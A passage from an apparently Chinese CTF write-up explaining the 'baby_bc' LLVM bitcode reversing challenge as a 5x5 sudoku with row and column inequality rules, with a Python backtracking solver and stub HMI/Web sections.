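for offset in range(0, len(chars) - 7, 8):
    word = int.from_bytes(bytes(chars[offset:offset + 8]), 'little')
    print(flag_str[tmp[word % 8 - 1]], end='')
print()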

baby_bc

bc全称bitcode,是一种中间语言。资料链接如下:

https://blog.csdn.net/chqj_163/article/details/90238350

利用llvm可以反编译源码或者直接编译成可执行程序。这里我做这道题的时候是队友直接给我的编译好的可执行文件。

IDA一条龙发现,逻辑十分简单,就是一个5x5的数独,三张表,一张表是地图,一张是每一行内的自定义约束规则,一张是每一列内的自定义约束规则,可以手算可以写脚本,5x5其实直接手算就行.

解数独脚本如下:(注意程序中有一个输入检验函数,要求初始地图中已给出数据的位置输入为 0)

def print_grid(arr):
    """Print the first 5x5 cells of arr, one row per line, cells run together.

    Each cell is rendered with str(); no separator is inserted between cells.
    """
    for r in range(5):
        # print() adds a newline by default in Python 3, so build the row first.
        print("".join(str(arr[r][c]) for c in range(5)))

def find_empty_location(arr, l):
    """Locate the first cell equal to 0, scanning row-major over the 5x5 grid.

    On success writes the position into l[0] (row) and l[1] (col) and
    returns True. Returns False, leaving l untouched, when no cell is 0.
    """
    for row in range(5):
        cells = arr[row]
        for col in range(5):
            if cells[col] != 0:
                continue
            l[0], l[1] = row, col
            return True
    return False

def used_in_row(arr, row, num):
    """Return True if num already occupies one of the first five cells of row."""
    return any(arr[row][c] == num for c in range(5))

def used_in_col(arr, col, num):
    """Return True if num already occupies one of the first five cells of col."""
    return any(arr[r][col] == num for r in range(5))

def check_location_is_safe(arr, row, col, num):
    """Return True when num appears in neither row `row` nor column `col`."""
    clash = used_in_row(arr, row, num) or used_in_col(arr, col, num)
    return not clash

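# Inequality rules between neighbouring cells (0 = no rule). These are the two
# rule tables the write-up describes; they were previously rebuilt inside the
# recursion on every completed grid.
# ROW_RULES[r][c] compares cell (r, c) with its right-hand neighbour (r, c+1):
#   1 -> left >= right, 2 -> left <= right.
ROW_RULES = [[0x00, 0x00, 0x00, 0x01],
             [0x01, 0x00, 0x00, 0x00],
             [0x02, 0x00, 0x00, 0x01],
             [0x00, 0x00, 0x00, 0x00],
             [0x01, 0x00, 0x01, 0x00]]
# COL_RULES[r][c] compares cell (r, c) with the cell below it (r+1, c):
#   1 -> upper <= lower, 2 -> upper >= lower.
COL_RULES = [[0x00, 0x00, 0x02, 0x00, 0x02],
             [0x00, 0x00, 0x00, 0x00, 0x00],
             [0x00, 0x00, 0x00, 0x01, 0x00],
             [0x00, 0x01, 0x00, 0x00, 0x01]]


def _satisfies_rules(arr):
    """Return True when a fully filled 5x5 grid meets every ROW_RULES/COL_RULES entry."""
    for r in range(5):
        for c in range(4):
            rule = ROW_RULES[r][c]
            if rule == 1 and arr[r][c] < arr[r][c + 1]:
                return False
            if rule == 2 and arr[r][c] > arr[r][c + 1]:
                return False
    for r in range(4):
        for c in range(5):
            rule = COL_RULES[r][c]
            if rule == 1 and arr[r][c] > arr[r + 1][c]:
                return False
            if rule == 2 and arr[r][c] < arr[r + 1][c]:
                return False
    return True


def solve_sudoku(arr):
    """Enumerate every Latin-square completion of arr and print the ones that
    satisfy the inequality rules.

    Args:
        arr: 5x5 list of lists; 0 marks an empty cell. Cells are filled and
            cleared in place during the search, so arr is back to its input
            state when the call returns.

    Returns:
        True only in the base case (no empty cell left), which tells the
        caller that a complete grid is ready to be checked. Every other call
        returns False after trying all candidates, so the search does not stop
        at the first match but prints every grid that passes the rules.
    """
    pos = [0, 0]
    if not find_empty_location(arr, pos):
        return True
    row, col = pos

    for num in range(1, 6):
        if not check_location_is_safe(arr, row, col, num):
            continue
        arr[row][col] = num
        # True from the recursion means the grid is complete; only then do the
        # row/column inequality rules get checked.
        if solve_sudoku(arr) and _satisfies_rules(arr):
            # Print the grid passed in, not the module-level `grid` the
            # original referenced (which only worked when called from main).
            print_grid(arr)
            print()
            print()
        # Undo the choice so the next candidate starts from an empty cell.
        arr[row][col] = 0

    return False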


if __name__ == "__main__":
    # Starting map: two givens, 4 at (row 2, col 2) and 3 at (row 3, col 3);
    # 0 marks a cell the solver may fill.
    grid = [[0 for _ in range(5)] for _ in range(5)]
    grid[2][2] = 4
    grid[3][3] = 3
    solve_sudoku(grid)

HMI

敬请期待2333

Web(请点击跳转)

隐藏